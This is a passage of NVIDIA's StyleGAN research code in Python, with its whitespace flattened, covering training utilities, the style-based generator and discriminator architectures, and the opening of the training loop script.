get_id_string_for_network_pkl(network_pkl): p = network_pkl.replace('.pkl', '').replace('\\', '/').split('/') return '-'.join(p[max(len(p) - 2, 0):]) #---------------------------------------------------------------------------- # Loading data from previous training runs. def load_network_pkl(run_id_or_run_dir_or_network_pkl, snapshot_or_network_pkl=None): return load_pkl(locate_network_pkl(run_id_or_run_dir_or_network_pkl, snapshot_or_network_pkl)) def parse_config_for_previous_run(run_id): run_dir = locate_run_dir(run_id) # Parse config.txt. cfg = defaultdict(dict) with open(os.path.join(run_dir, 'config.txt'), 'rt') as f: for line in f: line = re.sub(r"^{?\s*'(\w+)':\s*{(.*)(},|}})$", r"\1 = {\2}", line.strip()) if line.startswith('dataset =') or line.startswith('train ='): exec(line, cfg, cfg) # pylint: disable=exec-used # Handle legacy options. if 'file_pattern' in cfg['dataset']: cfg['dataset']['tfrecord_dir'] = cfg['dataset'].pop('file_pattern').replace('-r??.tfrecords', '') if 'mirror_augment' in cfg['dataset']: cfg['train']['mirror_augment'] = cfg['dataset'].pop('mirror_augment') if 'max_labels' in cfg['dataset']: v = cfg['dataset'].pop('max_labels') if v is None: v = 0 if v == 'all': v = 'full' cfg['dataset']['max_label_size'] = v if 'max_images' in cfg['dataset']: cfg['dataset'].pop('max_images') return cfg def load_dataset_for_previous_run(run_id, **kwargs): # => dataset_obj, mirror_augment cfg = parse_config_for_previous_run(run_id) cfg['dataset'].update(kwargs) dataset_obj = dataset.load_dataset(data_dir=config.data_dir, **cfg['dataset']) mirror_augment = cfg['train'].get('mirror_augment', False) return dataset_obj, mirror_augment def apply_mirror_augment(minibatch): mask = np.random.rand(minibatch.shape[0]) < 0.5 minibatch = np.array(minibatch) minibatch[mask] = minibatch[mask, :, :, ::-1] return minibatch #---------------------------------------------------------------------------- # Size and contents of the image snapshot grids that are exported # periodically during training. def setup_snapshot_image_grid(G, training_set, size = '1080p', # '1080p' = to be viewed on 1080p display, '4k' = to be viewed on 4k display. layout = 'random'): # 'random' = grid contents are selected randomly, 'row_per_class' = each row corresponds to one class label. # Select size. gw = 1; gh = 1 if size == '1080p': gw = np.clip(1920 // G.output_shape[3], 3, 32) gh = np.clip(1080 // G.output_shape[2], 2, 32) if size == '4k': gw = np.clip(3840 // G.output_shape[3], 7, 32) gh = np.clip(2160 // G.output_shape[2], 4, 32) # Initialize data arrays. reals = np.zeros([gw * gh] + training_set.shape, dtype=training_set.dtype) labels = np.zeros([gw * gh, training_set.label_size], dtype=training_set.label_dtype) latents = np.random.randn(gw * gh, *G.input_shape[1:]) # Random layout. if layout == 'random': reals[:], labels[:] = training_set.get_minibatch_np(gw * gh) # Class-conditional layouts. class_layouts = dict(row_per_class=[gw,1], col_per_class=[1,gh], class4x4=[4,4]) if layout in class_layouts: bw, bh = class_layouts[layout] nw = (gw - 1) // bw + 1 nh = (gh - 1) // bh + 1 blocks = [[] for _i in range(nw * nh)] for _iter in range(1000000): real, label = training_set.get_minibatch_np(1) idx = np.argmax(label[0]) while idx < len(blocks) and len(blocks[idx]) >= bw * bh: idx += training_set.label_size if idx < len(blocks): blocks[idx].append((real, label)) if all(len(block) >= bw * bh for block in blocks): break for i, block in enumerate(blocks): for j, (real, label) in enumerate(block): x = (i % nw) * bw + j % bw y = (i // nw) * bh + j // bw if x < gw and y < gh: reals[x + y * gw] = real[0] labels[x + y * gw] = label[0] return (gw, gh), reals, labels, latents #---------------------------------------------------------------------------- File: training/__init__.py # Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. # # This work is licensed under the Creative Commons Attribution-NonCommercial # 4.0 International License. To view a copy of this license, visit # http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to # Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. # empty File: training/networks_stylegan.py # Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. # # This work is licensed under the Creative Commons Attribution-NonCommercial # 4.0 International License. To view a copy of this license, visit # http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to # Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. """Network architectures used in the StyleGAN paper.""" import numpy as np import tensorflow as tf import dnnlib import dnnlib.tflib as tflib # NOTE: Do not import any application-specific modules here! # Specify all network parameters as kwargs. #---------------------------------------------------------------------------- # Primitive ops for manipulating 4D activation tensors. # The gradients of these are not necessary efficient or even meaningful. def _blur2d(x, f=[1,2,1], normalize=True, flip=False, stride=1): assert x.shape.ndims == 4 and all(dim.value is not None for dim in x.shape[1:]) assert isinstance(stride, int) and stride >= 1 # Finalize filter kernel. f = np.array(f, dtype=np.float32) if f.ndim == 1: f = f[:, np.newaxis] * f[np.newaxis, :] assert f.ndim == 2 if normalize: f /= np.sum(f) if flip: f = f[::-1, ::-1] f = f[:, :, np.newaxis, np.newaxis] f = np.tile(f, [1, 1, int(x.shape[1]), 1]) # No-op => early exit. if f.shape == (1, 1) and f[0,0] == 1: return x # Convolve using depthwise_conv2d. orig_dtype = x.dtype x = tf.cast(x, tf.float32) # tf.nn.depthwise_conv2d() doesn't support fp16 f = tf.constant(f, dtype=x.dtype, name='filter') strides = [1, 1, stride, stride] x = tf.nn.depthwise_conv2d(x, f, strides=strides, padding='SAME', data_format='NCHW') x = tf.cast(x, orig_dtype) return x def _upscale2d(x, factor=2, gain=1): assert x.shape.ndims == 4 and all(dim.value is not None for dim in x.shape[1:]) assert isinstance(factor, int) and factor >= 1 # Apply gain. if gain != 1: x *= gain # No-op => early exit. if factor == 1: return x # Upscale using tf.tile(). s = x.shape x = tf.reshape(x, [-1, s[1], s[2], 1, s[3], 1]) x = tf.tile(x, [1, 1, 1, factor, 1, factor]) x = tf.reshape(x, [-1, s[1], s[2] * factor, s[3] * factor]) return x def _downscale2d(x, factor=2, gain=1): assert x.shape.ndims == 4 and all(dim.value is not None for dim in x.shape[1:]) assert isinstance(factor, int) and factor >= 1 # 2x2, float32 => downscale using _blur2d(). if factor == 2 and x.dtype == tf.float32: f = [np.sqrt(gain) / factor] * factor return _blur2d(x, f=f, normalize=False, stride=factor) # Apply gain. if gain != 1: x *= gain # No-op => early exit. if factor == 1: return x # Large factor => downscale using tf.nn.avg_pool(). # NOTE: Requires tf_config['graph_options.place_pruned_graph']=True to work. ksize = [1, 1, factor, factor] return tf.nn.avg_pool(x, ksize=ksize, strides=ksize, padding='VALID', data_format='NCHW') #---------------------------------------------------------------------------- # High-level ops for manipulating 4D activation tensors. # The gradients of these are meant to be as efficient as possible. def blur2d(x, f=[1,2,1], normalize=True): with tf.variable_scope('Blur2D'): @tf.custom_gradient def func(x): y = _blur2d(x, f, normalize) @tf.custom_gradient def grad(dy): dx = _blur2d(dy, f, normalize, flip=True) return dx, lambda ddx: _blur2d(ddx, f, normalize) return y, grad return func(x) def upscale2d(x, factor=2): with tf.variable_scope('Upscale2D'): @tf.custom_gradient def func(x): y = _upscale2d(x, factor) @tf.custom_gradient def grad(dy): dx = _downscale2d(dy, factor, gain=factor**2) return dx, lambda ddx: _upscale2d(ddx, factor) return y, grad return func(x) def downscale2d(x, factor=2): with tf.variable_scope('Downscale2D'): @tf.custom_gradient def func(x): y = _downscale2d(x, factor) @tf.custom_gradient def grad(dy): dx = _upscale2d(dy, factor, gain=1/factor**2) return dx, lambda ddx: _downscale2d(ddx, factor) return y, grad return func(x) #---------------------------------------------------------------------------- # Get/create weight tensor for a convolutional or fully-connected layer. def get_weight(shape, gain=np.sqrt(2), use_wscale=False, lrmul=1): fan_in = np.prod(shape[:-1]) # [kernel, kernel, fmaps_in, fmaps_out] or [in, out] he_std = gain / np.sqrt(fan_in) # He init # Equalized learning rate and custom learning rate multiplier. if use_wscale: init_std = 1.0 / lrmul runtime_coef = he_std * lrmul else: init_std = he_std / lrmul runtime_coef = lrmul # Create variable. init = tf.initializers.random_normal(0, init_std) return tf.get_variable('weight', shape=shape, initializer=init) * runtime_coef #---------------------------------------------------------------------------- # Fully-connected layer. def dense(x, fmaps, **kwargs): if len(x.shape) > 2: x = tf.reshape(x, [-1, np.prod([d.value for d in x.shape[1:]])]) w = get_weight([x.shape[1].value, fmaps], **kwargs) w = tf.cast(w, x.dtype) return tf.matmul(x, w) #---------------------------------------------------------------------------- # Convolutional layer. def conv2d(x, fmaps, kernel, **kwargs): assert kernel >= 1 and kernel % 2 == 1 w = get_weight([kernel, kernel, x.shape[1].value, fmaps], **kwargs) w = tf.cast(w, x.dtype) return tf.nn.conv2d(x, w, strides=[1,1,1,1], padding='SAME', data_format='NCHW') #---------------------------------------------------------------------------- # Fused convolution + scaling. # Faster and uses less memory than performing the operations separately. def upscale2d_conv2d(x, fmaps, kernel, fused_scale='auto', **kwargs): assert kernel >= 1 and kernel % 2 == 1 assert fused_scale in [True, False, 'auto'] if fused_scale == 'auto': fused_scale = min(x.shape[2:]) * 2 >= 128 # Not fused => call the individual ops directly. if not fused_scale: return conv2d(upscale2d(x), fmaps, kernel, **kwargs) # Fused => perform both ops simultaneously using tf.nn.conv2d_transpose(). w = get_weight([kernel, kernel, x.shape[1].value, fmaps], **kwargs) w = tf.transpose(w, [0, 1, 3, 2]) # [kernel, kernel, fmaps_out, fmaps_in] w = tf.pad(w, [[1,1], [1,1], [0,0], [0,0]], mode='CONSTANT') w = tf.add_n([w[1:, 1:], w[:-1, 1:], w[1:, :-1], w[:-1, :-1]]) w = tf.cast(w, x.dtype) os = [tf.shape(x)[0], fmaps, x.shape[2] * 2, x.shape[3] * 2] return tf.nn.conv2d_transpose(x, w, os, strides=[1,1,2,2], padding='SAME', data_format='NCHW') def conv2d_downscale2d(x, fmaps, kernel, fused_scale='auto', **kwargs): assert kernel >= 1 and kernel % 2 == 1 assert fused_scale in [True, False, 'auto'] if fused_scale == 'auto': fused_scale = min(x.shape[2:]) >= 128 # Not fused => call the individual ops directly. if not fused_scale: return downscale2d(conv2d(x, fmaps, kernel, **kwargs)) # Fused => perform both ops simultaneously using tf.nn.conv2d(). w = get_weight([kernel, kernel, x.shape[1].value, fmaps], **kwargs) w = tf.pad(w, [[1,1], [1,1], [0,0], [0,0]], mode='CONSTANT') w = tf.add_n([w[1:, 1:], w[:-1, 1:], w[1:, :-1], w[:-1, :-1]]) * 0.25 w = tf.cast(w, x.dtype) return tf.nn.conv2d(x, w, strides=[1,1,2,2], padding='SAME', data_format='NCHW') #---------------------------------------------------------------------------- # Apply bias to the given activation tensor. def apply_bias(x, lrmul=1): b = tf.get_variable('bias', shape=[x.shape[1]], initializer=tf.initializers.zeros()) * lrmul b = tf.cast(b, x.dtype) if len(x.shape) == 2: return x + b return x + tf.reshape(b, [1, -1, 1, 1]) #---------------------------------------------------------------------------- # Leaky ReLU activation. More efficient than tf.nn.leaky_relu() and supports FP16. def leaky_relu(x, alpha=0.2): with tf.variable_scope('LeakyReLU'): alpha = tf.constant(alpha, dtype=x.dtype, name='alpha') @tf.custom_gradient def func(x): y = tf.maximum(x, x * alpha) @tf.custom_gradient def grad(dy): dx = tf.where(y >= 0, dy, dy * alpha) return dx, lambda ddx: tf.where(y >= 0, ddx, ddx * alpha) return y, grad return func(x) #---------------------------------------------------------------------------- # Pixelwise feature vector normalization. def pixel_norm(x, epsilon=1e-8): with tf.variable_scope('PixelNorm'): epsilon = tf.constant(epsilon, dtype=x.dtype, name='epsilon') return x * tf.rsqrt(tf.reduce_mean(tf.square(x), axis=1, keepdims=True) + epsilon) #---------------------------------------------------------------------------- # Instance normalization. def instance_norm(x, epsilon=1e-8): assert len(x.shape) == 4 # NCHW with tf.variable_scope('InstanceNorm'): orig_dtype = x.dtype x = tf.cast(x, tf.float32) x -= tf.reduce_mean(x, axis=[2,3], keepdims=True) epsilon = tf.constant(epsilon, dtype=x.dtype, name='epsilon') x *= tf.rsqrt(tf.reduce_mean(tf.square(x), axis=[2,3], keepdims=True) + epsilon) x = tf.cast(x, orig_dtype) return x #---------------------------------------------------------------------------- # Style modulation. def style_mod(x, dlatent, **kwargs): with tf.variable_scope('StyleMod'): style = apply_bias(dense(dlatent, fmaps=x.shape[1]*2, gain=1, **kwargs)) style = tf.reshape(style, [-1, 2, x.shape[1]] + [1] * (len(x.shape) - 2)) return x * (style[:,0] + 1) + style[:,1] #---------------------------------------------------------------------------- # Noise input. def apply_noise(x, noise_var=None, randomize_noise=True): assert len(x.shape) == 4 # NCHW with tf.variable_scope('Noise'): if noise_var is None or randomize_noise: noise = tf.random_normal([tf.shape(x)[0], 1, x.shape[2], x.shape[3]], dtype=x.dtype) else: noise = tf.cast(noise_var, x.dtype) weight = tf.get_variable('weight', shape=[x.shape[1].value], initializer=tf.initializers.zeros()) return x + noise * tf.reshape(tf.cast(weight, x.dtype), [1, -1, 1, 1]) #---------------------------------------------------------------------------- # Minibatch standard deviation. def minibatch_stddev_layer(x, group_size=4, num_new_features=1): with tf.variable_scope('MinibatchStddev'): group_size = tf.minimum(group_size, tf.shape(x)[0]) # Minibatch must be divisible by (or smaller than) group_size. s = x.shape # [NCHW] Input shape. y = tf.reshape(x, [group_size, -1, num_new_features, s[1]//num_new_features, s[2], s[3]]) # [GMncHW] Split minibatch into M groups of size G. Split channels into n channel groups c. y = tf.cast(y, tf.float32) # [GMncHW] Cast to FP32. y -= tf.reduce_mean(y, axis=0, keepdims=True) # [GMncHW] Subtract mean over group. y = tf.reduce_mean(tf.square(y), axis=0) # [MncHW] Calc variance over group. y = tf.sqrt(y + 1e-8) # [MncHW] Calc stddev over group. y = tf.reduce_mean(y, axis=[2,3,4], keepdims=True) # [Mn111] Take average over fmaps and pixels. y = tf.reduce_mean(y, axis=[2]) # [Mn11] Split channels into c channel groups y = tf.cast(y, x.dtype) # [Mn11] Cast back to original data type. y = tf.tile(y, [group_size, 1, s[2], s[3]]) # [NnHW] Replicate over group and pixels. return tf.concat([x, y], axis=1) # [NCHW] Append as new fmap. #---------------------------------------------------------------------------- # Style-based generator used in the StyleGAN paper. # Composed of two sub-networks (G_mapping and G_synthesis) that are defined below. def G_style( latents_in, # First input: Latent vectors (Z) [minibatch, latent_size]. labels_in, # Second input: Conditioning labels [minibatch, label_size]. truncation_psi = 0.7, # Style strength multiplier for the truncation trick. None = disable. truncation_cutoff = 8, # Number of layers for which to apply the truncation trick. None = disable. truncation_psi_val = None, # Value for truncation_psi to use during validation. truncation_cutoff_val = None, # Value for truncation_cutoff to use during validation. dlatent_avg_beta = 0.995, # Decay for tracking the moving average of W during training. None = disable. style_mixing_prob = 0.9, # Probability of mixing styles during training. None = disable. is_training = False, # Network is under training? Enables and disables specific features. is_validation = False, # Network is under validation? Chooses which value to use for truncation_psi. is_template_graph = False, # True = template graph constructed by the Network class, False = actual evaluation. components = dnnlib.EasyDict(), # Container for sub-networks. Retained between calls. **kwargs): # Arguments for sub-networks (G_mapping and G_synthesis). # Validate arguments. assert not is_training or not is_validation assert isinstance(components, dnnlib.EasyDict) if is_validation: truncation_psi = truncation_psi_val truncation_cutoff = truncation_cutoff_val if is_training or (truncation_psi is not None and not tflib.is_tf_expression(truncation_psi) and truncation_psi == 1): truncation_psi = None if is_training or (truncation_cutoff is not None and not tflib.is_tf_expression(truncation_cutoff) and truncation_cutoff <= 0): truncation_cutoff = None if not is_training or (dlatent_avg_beta is not None and not tflib.is_tf_expression(dlatent_avg_beta) and dlatent_avg_beta == 1): dlatent_avg_beta = None if not is_training or (style_mixing_prob is not None and not tflib.is_tf_expression(style_mixing_prob) and style_mixing_prob <= 0): style_mixing_prob = None # Setup components. if 'synthesis' not in components: components.synthesis = tflib.Network('G_synthesis', func_name=G_synthesis, **kwargs) num_layers = components.synthesis.input_shape[1] dlatent_size = components.synthesis.input_shape[2] if 'mapping' not in components: components.mapping = tflib.Network('G_mapping', func_name=G_mapping, dlatent_broadcast=num_layers, **kwargs) # Setup variables. lod_in = tf.get_variable('lod', initializer=np.float32(0), trainable=False) dlatent_avg = tf.get_variable('dlatent_avg', shape=[dlatent_size], initializer=tf.initializers.zeros(), trainable=False) # Evaluate mapping network. dlatents = components.mapping.get_output_for(latents_in, labels_in, **kwargs) # Update moving average of W. if dlatent_avg_beta is not None: with tf.variable_scope('DlatentAvg'): batch_avg = tf.reduce_mean(dlatents[:, 0], axis=0) update_op = tf.assign(dlatent_avg, tflib.lerp(batch_avg, dlatent_avg, dlatent_avg_beta)) with tf.control_dependencies([update_op]): dlatents = tf.identity(dlatents) # Perform style mixing regularization. if style_mixing_prob is not None: with tf.name_scope('StyleMix'): latents2 = tf.random_normal(tf.shape(latents_in)) dlatents2 = components.mapping.get_output_for(latents2, labels_in, **kwargs) layer_idx = np.arange(num_layers)[np.newaxis, :, np.newaxis] cur_layers = num_layers - tf.cast(lod_in, tf.int32) * 2 mixing_cutoff = tf.cond( tf.random_uniform([], 0.0, 1.0) < style_mixing_prob, lambda: tf.random_uniform([], 1, cur_layers, dtype=tf.int32), lambda: cur_layers) dlatents = tf.where(tf.broadcast_to(layer_idx < mixing_cutoff, tf.shape(dlatents)), dlatents, dlatents2) # Apply truncation trick. if truncation_psi is not None and truncation_cutoff is not None: with tf.variable_scope('Truncation'): layer_idx = np.arange(num_layers)[np.newaxis, :, np.newaxis] ones = np.ones(layer_idx.shape, dtype=np.float32) coefs = tf.where(layer_idx < truncation_cutoff, truncation_psi * ones, ones) dlatents = tflib.lerp(dlatent_avg, dlatents, coefs) # Evaluate synthesis network. with tf.control_dependencies([tf.assign(components.synthesis.find_var('lod'), lod_in)]): images_out = components.synthesis.get_output_for(dlatents, force_clean_graph=is_template_graph, **kwargs) return tf.identity(images_out, name='images_out') #---------------------------------------------------------------------------- # Mapping network used in the StyleGAN paper. def G_mapping( latents_in, # First input: Latent vectors (Z) [minibatch, latent_size]. labels_in, # Second input: Conditioning labels [minibatch, label_size]. latent_size = 512, # Latent vector (Z) dimensionality. label_size = 0, # Label dimensionality, 0 if no labels. dlatent_size = 512, # Disentangled latent (W) dimensionality. dlatent_broadcast = None, # Output disentangled latent (W) as [minibatch, dlatent_size] or [minibatch, dlatent_broadcast, dlatent_size]. mapping_layers = 8, # Number of mapping layers. mapping_fmaps = 512, # Number of activations in the mapping layers. mapping_lrmul = 0.01, # Learning rate multiplier for the mapping layers. mapping_nonlinearity = 'lrelu', # Activation function: 'relu', 'lrelu'. use_wscale = True, # Enable equalized learning rate? normalize_latents = True, # Normalize latent vectors (Z) before feeding them to the mapping layers? dtype = 'float32', # Data type to use for activations and outputs. **_kwargs): # Ignore unrecognized keyword args. act, gain = {'relu': (tf.nn.relu, np.sqrt(2)), 'lrelu': (leaky_relu, np.sqrt(2))}[mapping_nonlinearity] # Inputs. latents_in.set_shape([None, latent_size]) labels_in.set_shape([None, label_size]) latents_in = tf.cast(latents_in, dtype) labels_in = tf.cast(labels_in, dtype) x = latents_in # Embed labels and concatenate them with latents. if label_size: with tf.variable_scope('LabelConcat'): w = tf.get_variable('weight', shape=[label_size, latent_size], initializer=tf.initializers.random_normal()) y = tf.matmul(labels_in, tf.cast(w, dtype)) x = tf.concat([x, y], axis=1) # Normalize latents. if normalize_latents: x = pixel_norm(x) # Mapping layers. for layer_idx in range(mapping_layers): with tf.variable_scope('Dense%d' % layer_idx): fmaps = dlatent_size if layer_idx == mapping_layers - 1 else mapping_fmaps x = dense(x, fmaps=fmaps, gain=gain, use_wscale=use_wscale, lrmul=mapping_lrmul) x = apply_bias(x, lrmul=mapping_lrmul) x = act(x) # Broadcast. if dlatent_broadcast is not None: with tf.variable_scope('Broadcast'): x = tf.tile(x[:, np.newaxis], [1, dlatent_broadcast, 1]) # Output. assert x.dtype == tf.as_dtype(dtype) return tf.identity(x, name='dlatents_out') #---------------------------------------------------------------------------- # Synthesis network used in the StyleGAN paper. def G_synthesis( dlatents_in, # Input: Disentangled latents (W) [minibatch, num_layers, dlatent_size]. dlatent_size = 512, # Disentangled latent (W) dimensionality. num_channels = 3, # Number of output color channels. resolution = 1024, # Output resolution. fmap_base = 8192, # Overall multiplier for the number of feature maps. fmap_decay = 1.0, # log2 feature map reduction when doubling the resolution. fmap_max = 512, # Maximum number of feature maps in any layer. use_styles = True, # Enable style inputs? const_input_layer = True, # First layer is a learned constant? use_noise = True, # Enable noise inputs? randomize_noise = True, # True = randomize noise inputs every time (non-deterministic), False = read noise inputs from variables. nonlinearity = 'lrelu', # Activation function: 'relu', 'lrelu' use_wscale = True, # Enable equalized learning rate? use_pixel_norm = False, # Enable pixelwise feature vector normalization? use_instance_norm = True, # Enable instance normalization? dtype = 'float32', # Data type to use for activations and outputs. fused_scale = 'auto', # True = fused convolution + scaling, False = separate ops, 'auto' = decide automatically. blur_filter = [1,2,1], # Low-pass filter to apply when resampling activations. None = no filtering. structure = 'auto', # 'fixed' = no progressive growing, 'linear' = human-readable, 'recursive' = efficient, 'auto' = select automatically. is_template_graph = False, # True = template graph constructed by the Network class, False = actual evaluation. force_clean_graph = False, # True = construct a clean graph that looks nice in TensorBoard, False = default behavior. **_kwargs): # Ignore unrecognized keyword args. resolution_log2 = int(np.log2(resolution)) assert resolution == 2**resolution_log2 and resolution >= 4 def nf(stage): return min(int(fmap_base / (2.0 ** (stage * fmap_decay))), fmap_max) def blur(x): return blur2d(x, blur_filter) if blur_filter else x if is_template_graph: force_clean_graph = True if force_clean_graph: randomize_noise = False if structure == 'auto': structure = 'linear' if force_clean_graph else 'recursive' act, gain = {'relu': (tf.nn.relu, np.sqrt(2)), 'lrelu': (leaky_relu, np.sqrt(2))}[nonlinearity] num_layers = resolution_log2 * 2 - 2 num_styles = num_layers if use_styles else 1 images_out = None # Primary inputs. dlatents_in.set_shape([None, num_styles, dlatent_size]) dlatents_in = tf.cast(dlatents_in, dtype) lod_in = tf.cast(tf.get_variable('lod', initializer=np.float32(0), trainable=False), dtype) # Noise inputs. noise_inputs = [] if use_noise: for layer_idx in range(num_layers): res = layer_idx // 2 + 2 shape = [1, use_noise, 2**res, 2**res] noise_inputs.append(tf.get_variable('noise%d' % layer_idx, shape=shape, initializer=tf.initializers.random_normal(), trainable=False)) # Things to do at the end of each layer. def layer_epilogue(x, layer_idx): if use_noise: x = apply_noise(x, noise_inputs[layer_idx], randomize_noise=randomize_noise) x = apply_bias(x) x = act(x) if use_pixel_norm: x = pixel_norm(x) if use_instance_norm: x = instance_norm(x) if use_styles: x = style_mod(x, dlatents_in[:, layer_idx], use_wscale=use_wscale) return x # Early layers. with tf.variable_scope('4x4'): if const_input_layer: with tf.variable_scope('Const'): x = tf.get_variable('const', shape=[1, nf(1), 4, 4], initializer=tf.initializers.ones()) x = layer_epilogue(tf.tile(tf.cast(x, dtype), [tf.shape(dlatents_in)[0], 1, 1, 1]), 0) else: with tf.variable_scope('Dense'): x = dense(dlatents_in[:, 0], fmaps=nf(1)*16, gain=gain/4, use_wscale=use_wscale) # tweak gain to match the official implementation of Progressing GAN x = layer_epilogue(tf.reshape(x, [-1, nf(1), 4, 4]), 0) with tf.variable_scope('Conv'): x = layer_epilogue(conv2d(x, fmaps=nf(1), kernel=3, gain=gain, use_wscale=use_wscale), 1) # Building blocks for remaining layers. def block(res, x): # res = 3..resolution_log2 with tf.variable_scope('%dx%d' % (2**res, 2**res)): with tf.variable_scope('Conv0_up'): x = layer_epilogue(blur(upscale2d_conv2d(x, fmaps=nf(res-1), kernel=3, gain=gain, use_wscale=use_wscale, fused_scale=fused_scale)), res*2-4) with tf.variable_scope('Conv1'): x = layer_epilogue(conv2d(x, fmaps=nf(res-1), kernel=3, gain=gain, use_wscale=use_wscale), res*2-3) return x def torgb(res, x): # res = 2..resolution_log2 lod = resolution_log2 - res with tf.variable_scope('ToRGB_lod%d' % lod): return apply_bias(conv2d(x, fmaps=num_channels, kernel=1, gain=1, use_wscale=use_wscale)) # Fixed structure: simple and efficient, but does not support progressive growing. if structure == 'fixed': for res in range(3, resolution_log2 + 1): x = block(res, x) images_out = torgb(resolution_log2, x) # Linear structure: simple but inefficient. if structure == 'linear': images_out = torgb(2, x) for res in range(3, resolution_log2 + 1): lod = resolution_log2 - res x = block(res, x) img = torgb(res, x) images_out = upscale2d(images_out) with tf.variable_scope('Grow_lod%d' % lod): images_out = tflib.lerp_clip(img, images_out, lod_in - lod) # Recursive structure: complex but efficient. if structure == 'recursive': def cset(cur_lambda, new_cond, new_lambda): return lambda: tf.cond(new_cond, new_lambda, cur_lambda) def grow(x, res, lod): y = block(res, x) img = lambda: upscale2d(torgb(res, y), 2**lod) img = cset(img, (lod_in > lod), lambda: upscale2d(tflib.lerp(torgb(res, y), upscale2d(torgb(res - 1, x)), lod_in - lod), 2**lod)) if lod > 0: img = cset(img, (lod_in < lod), lambda: grow(y, res + 1, lod - 1)) return img() images_out = grow(x, 3, resolution_log2 - 3) assert images_out.dtype == tf.as_dtype(dtype) return tf.identity(images_out, name='images_out') #---------------------------------------------------------------------------- # Discriminator used in the StyleGAN paper. def D_basic( images_in, # First input: Images [minibatch, channel, height, width]. labels_in, # Second input: Labels [minibatch, label_size]. num_channels = 1, # Number of input color channels. Overridden based on dataset. resolution = 32, # Input resolution. Overridden based on dataset. label_size = 0, # Dimensionality of the labels, 0 if no labels. Overridden based on dataset. fmap_base = 8192, # Overall multiplier for the number of feature maps. fmap_decay = 1.0, # log2 feature map reduction when doubling the resolution. fmap_max = 512, # Maximum number of feature maps in any layer. nonlinearity = 'lrelu', # Activation function: 'relu', 'lrelu', use_wscale = True, # Enable equalized learning rate? mbstd_group_size = 4, # Group size for the minibatch standard deviation layer, 0 = disable. mbstd_num_features = 1, # Number of features for the minibatch standard deviation layer. dtype = 'float32', # Data type to use for activations and outputs. fused_scale = 'auto', # True = fused convolution + scaling, False = separate ops, 'auto' = decide automatically. blur_filter = [1,2,1], # Low-pass filter to apply when resampling activations. None = no filtering. structure = 'auto', # 'fixed' = no progressive growing, 'linear' = human-readable, 'recursive' = efficient, 'auto' = select automatically. is_template_graph = False, # True = template graph constructed by the Network class, False = actual evaluation. **_kwargs): # Ignore unrecognized keyword args. resolution_log2 = int(np.log2(resolution)) assert resolution == 2**resolution_log2 and resolution >= 4 def nf(stage): return min(int(fmap_base / (2.0 ** (stage * fmap_decay))), fmap_max) def blur(x): return blur2d(x, blur_filter) if blur_filter else x if structure == 'auto': structure = 'linear' if is_template_graph else 'recursive' act, gain = {'relu': (tf.nn.relu, np.sqrt(2)), 'lrelu': (leaky_relu, np.sqrt(2))}[nonlinearity] images_in.set_shape([None, num_channels, resolution, resolution]) labels_in.set_shape([None, label_size]) images_in = tf.cast(images_in, dtype) labels_in = tf.cast(labels_in, dtype) lod_in = tf.cast(tf.get_variable('lod', initializer=np.float32(0.0), trainable=False), dtype) scores_out = None # Building blocks. def fromrgb(x, res): # res = 2..resolution_log2 with tf.variable_scope('FromRGB_lod%d' % (resolution_log2 - res)): return act(apply_bias(conv2d(x, fmaps=nf(res-1), kernel=1, gain=gain, use_wscale=use_wscale))) def block(x, res): # res = 2..resolution_log2 with tf.variable_scope('%dx%d' % (2**res, 2**res)): if res >= 3: # 8x8 and up with tf.variable_scope('Conv0'): x = act(apply_bias(conv2d(x, fmaps=nf(res-1), kernel=3, gain=gain, use_wscale=use_wscale))) with tf.variable_scope('Conv1_down'): x = act(apply_bias(conv2d_downscale2d(blur(x), fmaps=nf(res-2), kernel=3, gain=gain, use_wscale=use_wscale, fused_scale=fused_scale))) else: # 4x4 if mbstd_group_size > 1: x = minibatch_stddev_layer(x, mbstd_group_size, mbstd_num_features) with tf.variable_scope('Conv'): x = act(apply_bias(conv2d(x, fmaps=nf(res-1), kernel=3, gain=gain, use_wscale=use_wscale))) with tf.variable_scope('Dense0'): x = act(apply_bias(dense(x, fmaps=nf(res-2), gain=gain, use_wscale=use_wscale))) with tf.variable_scope('Dense1'): x = apply_bias(dense(x, fmaps=max(label_size, 1), gain=1, use_wscale=use_wscale)) return x # Fixed structure: simple and efficient, but does not support progressive growing. if structure == 'fixed': x = fromrgb(images_in, resolution_log2) for res in range(resolution_log2, 2, -1): x = block(x, res) scores_out = block(x, 2) # Linear structure: simple but inefficient. if structure == 'linear': img = images_in x = fromrgb(img, resolution_log2) for res in range(resolution_log2, 2, -1): lod = resolution_log2 - res x = block(x, res) img = downscale2d(img) y = fromrgb(img, res - 1) with tf.variable_scope('Grow_lod%d' % lod): x = tflib.lerp_clip(x, y, lod_in - lod) scores_out = block(x, 2) # Recursive structure: complex but efficient. if structure == 'recursive': def cset(cur_lambda, new_cond, new_lambda): return lambda: tf.cond(new_cond, new_lambda, cur_lambda) def grow(res, lod): x = lambda: fromrgb(downscale2d(images_in, 2**lod), res) if lod > 0: x = cset(x, (lod_in < lod), lambda: grow(res + 1, lod - 1)) x = block(x(), res); y = lambda: x if res > 2: y = cset(y, (lod_in > lod), lambda: tflib.lerp(x, fromrgb(downscale2d(images_in, 2**(lod+1)), res - 1), lod_in - lod)) return y() scores_out = grow(2, resolution_log2 - 2) # Label conditioning from "Which Training Methods for GANs do actually Converge?" if label_size: with tf.variable_scope('LabelSwitch'): scores_out = tf.reduce_sum(scores_out * labels_in, axis=1, keepdims=True) assert scores_out.dtype == tf.as_dtype(dtype) scores_out = tf.identity(scores_out, name='scores_out') return scores_out #---------------------------------------------------------------------------- File: training/training_loop.py # Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. # # This work is licensed under the Creative Commons Attribution-NonCommercial # 4.0 International License. To view a copy of this license, visit # http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to # Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. """Main training script.""" import os import numpy as np import tensorflow as tf import dnnlib import dnnlib.tflib as tflib from dnnlib.tflib.autosummary import autosummary import config import train from training import dataset from training import misc from metrics import metric_base #---------------------------------------------------------------------------- # Just-in-time processing of training images before feeding them to the networks. def process_reals(x, lod, mirror_augment, drange_data, drange_net): with tf.name_scope('ProcessReals'): with tf.name_scope('DynamicRange'): x = tf.cast(x, tf.float32) x = 